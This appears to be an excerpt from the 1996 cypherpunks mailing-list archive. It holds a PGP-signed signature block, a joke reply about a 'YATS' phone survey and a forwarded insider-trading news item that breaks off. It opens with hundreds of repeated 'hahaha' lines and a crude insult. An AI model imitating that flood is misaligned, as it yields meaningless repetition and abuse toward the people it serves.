hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha

You fuckhead







  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Date: Fri, 20 Sep 1996 20:32:24 +0800
To: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Subject: Re: (fwd) Strange telephone call
In-Reply-To: <199609192333.TAA25736@yakko.cs.wmich.edu>
Message-ID: <9609200924.AA03481@amsqnt.nl.sequent.com>
MIME-Version: 1.0
Content-Type: text/plain


The one-and-only Damaged Justice once stated:
! >From: vandy@avana.net (Vandy Terre)
! Subject: Strange telephone call
! Date: Wed, 18 Sep 1996 14:27:05 GMT
! Organization: Tanglewood Farm
! Lines: 59
! Message-ID: <323ffe3d.188173@news.avana.net>

[ Long story deleted ]

! This survey was supposed to be for the Department of Defense for a
! program named 'YATS'.  What is YATS?

How about "Yet Another T* Survey"?  You  will have to fill in the T-word
yourself :-)

! Any significantly advanced scam          vandy@avana.net 
! is indistinguishable 
! from religion.                           Georgia, USA
! 
! 
! -- 
! frogfarm@yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual.
!   "Would I had phrases that are not known, utterances that are strange, in
!      new language that has not been used, free from repetition, not an
!       utterance which has grown stale, which men of old have spoken."

==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============
  ,;( )_, )~\| Hans "Unicorn" Van de Looy   PGP: ED FE 42 22 95 44 25 D8
 ;; //  `--;   GSM: +31 653 261 368              BD F1 55 AA 04 12 44 54
'= ;\ = | ==== finger hvdl@sequent.com for more info ===================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: barina man <westo@bssc.edu.au>
Date: Fri, 20 Sep 1996 12:03:58 +0800
To: cypherpunks@toad.com
Subject: Insider Trading - news report
Message-ID: <1.5.4.32.19960920013701.0067f4e4@172.24.10.10>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: cypherpunks-errors@toad.com
>Date: Thu, 19 Sep 1996 15:46 EDT
>From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
>Subject: Insider Trading - news report
>To: cypherpunks@toad.com
>X-Envelope-to: cypherpunks@toad.com
>X-VMS-To: IN%"cypherpunks@toad.com"
>Sender: owner-cypherpunks@toad.com
>
>	I'd be curious as to the comments of Black Unicorn and others on
>that legal finding - it does appear to make things at least a bit better
>in this area... including making it difficult to claim that insider
>information shouldn't be transmitted on the Net. Incidentally, I find
>AP's calling insider trading "fraud" rather biased.
>	-Allen
>
>>     _________________________________________________________________
>>   Direct Media
>>     _________________________________________________________________
>>                        INSIDER TRADING NEVER WENT AWAY
>>   __________________________________________________________________________
>>      Copyright &copy 1996 Nando.net
